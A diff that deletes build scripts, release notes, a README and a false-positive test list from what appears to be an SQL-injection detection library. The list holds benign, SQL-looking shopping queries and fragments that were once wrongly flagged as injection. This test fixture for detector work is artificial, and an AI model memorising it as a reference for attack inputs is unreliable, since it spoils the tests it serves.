There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
|
||||
|
||||
## test and commit
|
||||
|
||||
Something like this
|
||||
```sh
|
||||
make test
|
||||
git commit -m 'VERSION'
|
||||
```
|
||||
|
||||
## run ./tags.sh
|
||||
|
||||
This will get the version number from the file above and create a local
|
||||
and remote tag.
|
||||
|
||||
## HELP!
|
||||
|
||||
I would be great to dump a src tarball on github releases.
|
||||
|
|
@ -1,20 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
|
||||
make -e check
|
|
@ -1,20 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
|
||||
make -e check
|
|
@ -1,16 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# See https://wiki.debian.org/Hardening for details
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
|
||||
make -e
|
|
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
make -e
|
||||
|
||||
|
|
@ -1,9 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-O2 -pg -ansi"
|
||||
make -e
|
||||
|
|
@ -1,12 +0,0 @@
|
|||
Files in this directory are sample input for SQLi or false positives
|
||||
|
||||
Lines that are empty or start with `#` ignored. Otherwise they should
|
||||
be URL-encoded "user input" as might be found in query string.
|
||||
|
||||
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
|
||||
outliers).
|
||||
|
||||
The `false-positive.txt` file are inputs that in the process of
|
||||
development where falsely marked as sqli.
|
||||
|
||||
|
|
@ -1,443 +0,0 @@
|
|||
#
|
||||
# List of various inputs that failed and caused a false positive
|
||||
#
|
||||
24-7-TEAM
|
||||
A-LAST-MINUTE
|
||||
1/26/11
|
||||
TRUE#LAST
|
||||
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
|
||||
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
|
||||
NOT ALL WHO WANDER
|
||||
ALL NATURAL SKIN CARE
|
||||
DAD TO BE
|
||||
UNIQUE TABLE RUNNER
|
||||
AS FOR ME AND MY HOUSE
|
||||
LOCK AND KEY
|
||||
1 BY 1 INCH PILLOWS
|
||||
SET WITH ENVELOPES
|
||||
FROM TO TAG CHRISTMAS
|
||||
3 BY 5 RECIPE CARDS
|
||||
3 TO 6 MONTHS
|
||||
BY ORDER OF THE MANAGEMENT
|
||||
A IS FOR ADORABLE
|
||||
WHERE IS GEORGE
|
||||
KEY TO MY HEART
|
||||
Y'ALL COME BACK NOW
|
||||
1950's dresses
|
||||
EC-2HM85288X8372881C
|
||||
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
|
||||
MATS 5" BY 7"
|
||||
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
|
||||
JACK-O'-LANTERN?
|
||||
7 AND A HALF
|
||||
7 FOR ALL MANKIND
|
||||
5 AND A QUARTER BY 8 INCHES
|
||||
40 AND FAB
|
||||
6 KEY CHAR
|
||||
3 FOR 20
|
||||
F AND A NECKLACE
|
||||
21 LONG IN
|
||||
FD AND C COSMETIC COLORANT
|
||||
2 OR 4 METAL BUTTONS
|
||||
13 IS A LUCKY NUMBER
|
||||
1 AND 1/2" BUTTON
|
||||
"DARE TO BE AWESOME":
|
||||
"ALASKA" + 1978
|
||||
10 DOUBLE LOOP SETS
|
||||
B IS FOR BLACK BY TATIANA SOROKA
|
||||
DANCIN' LIKE A ROBOT ON FIRE
|
||||
D AND D DICE
|
||||
BE TRUE 2 U
|
||||
B AND A PRINTS
|
||||
"SWEATER DRESS" AND "CHRISTMAS"
|
||||
SMALL "& SIGN
|
||||
9-2-5 BLACK PUMPS
|
||||
2-3/4 CELLO BAGS
|
||||
30-30-60 INVITE
|
||||
11-11-11 DAY POPPY
|
||||
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
|
||||
1-1/8 PLUGS
|
||||
1 1/8 PLUGS
|
||||
1&1/8 PLUGS
|
||||
909-527-9247
|
||||
+1 (917) 666-0987
|
||||
(9178787873)
|
||||
(junk)
|
||||
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
|
||||
DRESS SIZE 20" -PATTERN -BABY
|
||||
"CROSS STITCH" -PDF -WOOL
|
||||
DRESS WITH HAT 18';
|
||||
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
|
||||
IN ORDER TO USE SEARCH
|
||||
BEGIN EACH DAY WITH LOVE
|
||||
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
|
||||
IF-9-86MDXMB1Z-FINBSB4WIDF-B
|
||||
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
|
||||
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
|
||||
CHRISTMAS STOCKING "NOT" STUFFER
|
||||
ORDER@ALLTHATSHEWANTS.US
|
||||
ALL@MKSAT.NET
|
||||
ALL NATURAL SHA
|
||||
WHERE IS THE SHOW
|
||||
"ALASKA" + 1978
|
||||
SMALL "&" SIGN
|
||||
50%2526%252339%253Bs
|
||||
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
|
||||
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
|
||||
poem+'if'
|
||||
CRAFT SHOW SET
|
||||
DIARY WITH LOCK
|
||||
CLIP ON READ
|
||||
CLOCK WITH KEYS
|
||||
THERE IS NOT PLACE LIKE HOME
|
||||
BASE; SET SWAROVSKI
|
||||
LED -(ZEPPELIN)
|
||||
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
|
||||
70" ROUND TABLE CLOTH
|
||||
"CASE"
|
||||
"RIGHT ON"
|
||||
"NOT ALL WHO WANDER"
|
||||
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
|
||||
CAT2_GALLERY_20">ETSY</A
|
||||
OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
|
||||
ALLENTOWN, () PA UNITED STATES
|
||||
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
GREEN...GREEN...GREENISH))) BY JULIA
|
||||
BRIDAL SHOWER INVITATION RECIPE CARDS'===
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
|
||||
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
|
||||
7/" ALUMINUM DISC
|
||||
"MOD" "KITCHEN"
|
||||
'M M L"\\ INITIALS
|
||||
I' IS NOT A PLASTIC BAG
|
||||
;EACH
|
||||
;ON
|
||||
IPHONE CASE 4 CASE
|
||||
LAPTOP CASE 13 AND PHONE
|
||||
IPAD -4 CASE
|
||||
EP-2 CASE
|
||||
ECID=15&
|
||||
"///
|
||||
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
|
||||
2012 WRITE ON CALENDAR
|
||||
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
|
||||
MACBOOK CASE 13 -IPHONE -IPAD
|
||||
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
|
||||
LAPTOP CASE 14'
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
SILVER BRACELET "FORCE"
|
||||
MOVIN' ON T-SHIRT
|
||||
77921690/TURQUOISE-NATURAL-TU
|
||||
"WRITE" DESIGN
|
||||
"WHERE'S GEORGE"
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
"UNION" BY ROBERT F
|
||||
"TABLE"
|
||||
"TRUE"
|
||||
"ON" WHITE GREEN
|
||||
"CREATE" STERLING GOLD
|
||||
"CHANGE" NECKLACE
|
||||
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
|
||||
TAN (WATER RESISTANT INSULATED) MESSENGER
|
||||
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
|
||||
1/4"-1/2" WIDE RIBBON
|
||||
1/4"-1" WIDE RIBBON
|
||||
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
|
||||
'-"8 TRACK" PLAYER
|
||||
"AND WHEN THE KIDS ARE OLD ENOUGH"
|
||||
"AND WHEN THE KIDS ARE OLD
|
||||
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
|
||||
"WOOD" AND "SIGN" AND "POLKA DOTS"
|
||||
TAN
|
||||
INFINITY LOOP SCARF
|
||||
INFINITY LOOP
|
||||
7 DEC 01
|
||||
CARDS @ TWITTER
|
||||
1;1;1;CONTROL;0;0;1;
|
||||
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
|
||||
7 AND A HALF
|
||||
1060 OR 70S
|
||||
18 CREATE GOLD
|
||||
2 LOOP CONNECTORS
|
||||
7 AND HALF
|
||||
8 LOOP BOW
|
||||
8 OR 9 WLV
|
||||
00 AND 3
|
||||
10.00 AND UNDER
|
||||
102 TABLE CLOTH
|
||||
10 OR LESS
|
||||
TRUE-CUT
|
||||
1.25 READ BUTTONS
|
||||
"ON SALE ON SALE"
|
||||
(NEW AND UNIQUE)
|
||||
NEW AND UNIQUE)
|
||||
1 REAL FEATHER AND 1 PETITE REAL SHELL
|
||||
(DICKEY DICKIE*)
|
||||
(1297-MR)
|
||||
1297-MR),
|
||||
(BRASS) PEN -BULLET
|
||||
(CERAMIC OR POTTERY) MUGS
|
||||
3/4 FEAR AND LOATHING
|
||||
1 FEAR AND LOATHING
|
||||
9/16 PLUGS AND TUNNELS
|
||||
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
|
||||
"RETURN ADDRESS LABELS" STICKER
|
||||
"ON THE WAY"
|
||||
"ON THE AIR" SIGN
|
||||
20 SET 3/4
|
||||
20 SET 3
|
||||
"CREATE A CRITTER"
|
||||
"INTO THE WILD"
|
||||
"ON FIRE FOR" WHITE GREEN
|
||||
"FOR BETTER OR WORSE"
|
||||
(ANTIQUE, VINTAGE) QUILT
|
||||
ANTIQUE, VINTAGE) QUILT
|
||||
(TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
OR-9-9WYTCZT313XRCN2UV62MBE1
|
||||
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
|
||||
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
|
||||
BLAH <A HREF="FOO.HTML">FOO</A>
|
||||
BLAH <A HREF="/FOO.HTML">FOO</A>
|
||||
RSCHMIDT @FPMC-WILLMAR/COM
|
||||
XSERVING"; ";PLATTER"; ";VINTAGE";
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
|
||||
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
|
||||
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
|
||||
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
|
||||
1.5 WITH 1/2 INCH LOOP END LOBSTER
|
||||
60;S MOD DRESSES
|
||||
7" #2 CIRCULAR NEEDLE
|
||||
9/PLUGS AND TUNNELS
|
||||
9/16PLUGS AND TUNNELS
|
||||
"NOT ON FACEBOOK"
|
||||
"#2 MOM"
|
||||
80%25 ACRYLIC AND 20%25 WOOL
|
||||
35%25 COTTON AND 65%25 POLYESTER.
|
||||
5685587||ORDER=||SECTION_ID=||PAGE=2
|
||||
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
|
||||
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
|
||||
BAMBOO CHARCOAL SOAP 1 '#
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
|
||||
BOOKMAR';[K]]
|
||||
WOOL AND ACRYLIC FOR SOFTNESS
|
||||
01/DEC/2011:20:45:25
|
||||
0;1;0;1;0
|
||||
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
|
||||
WOMEN';S ART DEC
|
||||
DO OR NOT DO, THERE IS NO
|
||||
ABC AND 123 WALL DEC
|
||||
1.5 WITH 1/2 INCH LOOP END
|
||||
"NOT FOR SALE"
|
||||
"IS" STAMP
|
||||
"LIKE" STAMP
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
1950' AND 60'S WOMEN'S COATS WITH FAKE
|
||||
FOO; BAR 1+2+3
|
||||
WO;DCAT[JPTPGRA][
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
|
||||
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
|
||||
0=[]'
|
||||
"AS FOR ME AND MY
|
||||
"EXIT, PURSUED B
|
||||
"EXIT, PURSUED BY
|
||||
4%27%2BX%2B4%27%2BWOOD
|
||||
48%22%2BX%2B48%22%2BMODERN%2BART
|
||||
90-%2B6%2BINCH
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
|
||||
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
|
||||
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
|
||||
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
|
||||
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
|
||||
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
|
||||
%22MOD%22%20%22
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
|
||||
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
DO%20OR%20NOT%20DO
|
||||
DO%20OR%20NOT%20DO%2C
|
||||
9%216%2BEARINGS
|
||||
%22NOT+GAY+AS+I
|
||||
%22+-+%22MAGAZINE%22
|
||||
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
|
||||
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
|
||||
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
|
||||
%27-%228
|
||||
%27-%228%20TRACK%22
|
||||
%27-%228%20TRACK%20PL
|
||||
2%20got%20%40AOL.COM
|
||||
L%3BIN%20TABLE%20RUNNER
|
||||
OW%3BCAST%20IRON%20TRIVETS
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
SET%208%20-MINI%20AS
|
||||
1/4%22-1/2RIBBON
|
||||
1/4%22-1/RIBBON
|
||||
PHILLIPKEEGAN-777-%40HOTMAIL.COM
|
||||
AUG%2B15%2BKEYS
|
||||
%22foo%22+AND+%22bar%22+AND
|
||||
%22foo%22+AND+%22bar%22
|
||||
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
|
||||
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
|
||||
FOO+BAR%27%23+BLAH
|
||||
5%2F8%2BLOOP
|
||||
CONNECTORS+%2B+2-PRONG
|
||||
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
|
||||
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
|
||||
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
|
||||
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
|
||||
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
|
||||
%2BIPHONE%2B4%2BCASE
|
||||
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
|
||||
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
|
||||
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
|
||||
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
THING%2B1%2BAND%2BTHING%2B2
|
||||
1Q9D819XMTILZVG1BOBY27-4-ROW
|
||||
NOT+AS+SAD+AS+I+USED+TO+BE
|
||||
NOT+AS+SAD+AS+I
|
||||
IPHONE%2B4%2BCASE%2BRUSSIAN
|
||||
COPPER%2B20%2BROUND
|
||||
CASE+FOR+KINDLE+WITH+KEYBOARD
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
|
||||
BIRTHDAY%2B12%2BMONTH%2B
|
||||
6R2OS3JNSM-48-IN-0ZENVYLUJJL
|
||||
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
|
||||
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
|
||||
GALLERY%3D1%3D5
|
||||
I+%3C3+%3C3
|
||||
I+%3C3+%3C3+THE+DOCTOR
|
||||
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
|
||||
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
|
||||
-3-B39RBBO58YMVIHEVAUZBS-6TF
|
||||
.75+%22+X+1.5%22
|
||||
"SIGNAL LOCK"
|
||||
3 TABLE LAMP WITH FLOWERS
|
||||
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
|
||||
1950 UNION MADE
|
||||
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
|
||||
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
|
||||
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
|
||||
SHELL IS 65 AND 35 POLY COTTON BLEND
|
||||
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
|
||||
5EOR-5MDKFIKK50HAHCPYPUVLG-2
|
||||
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
|
||||
5683190/TARGET="_BLANK"
|
||||
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
|
||||
